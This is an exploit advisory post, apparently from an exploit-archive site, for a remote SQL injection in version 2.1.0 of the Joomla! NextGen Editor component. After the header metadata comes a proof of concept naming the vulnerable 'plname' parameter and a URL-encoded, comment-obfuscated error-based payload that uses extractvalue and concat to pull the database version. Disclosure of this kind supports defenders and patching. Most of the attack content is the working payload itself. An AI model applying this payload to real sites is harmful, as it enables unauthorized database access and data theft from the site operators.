Joomla! NextGen Editor 2.1.0 SQL Injection

Joomla! NextGen Editor component version 2.1.0 suffers from a remote SQL injection vulnerability.


MD5 | 2c8b85eabf5921ee744c2ed6017bd135

# # # # #
# Exploit Title: Joomla! Component NextGen Editor 2.1.0 - SQL Injection
# Dork: N/A
# Date: 19.12.2017
# Vendor Homepage: hhttp://nextgeneditor.com/
# Software Link: https://extensions.joomla.org/extension/nextgen-editor/
# Software Download: http://nextgeneditor.com/index.php/en/testcategory/send/2-nge-editor-full/33-nextgeneditor-full-free
# Version: 2.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_nge&view=config&plname=[SQL]
#
# %22%20%20%2f%2a%21%30%37%37%37%37%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%30%37%37%37%37%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%2800%2c%2f%2a%21%30%37%37%37%37%63%6f%6e%63%61%74%2a%2f%280x27%2c0x496873616e2053656e63616e%2c0x3a%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c0%29%2d%2d%20%2d
#
# # # # #


Related Posts

Comments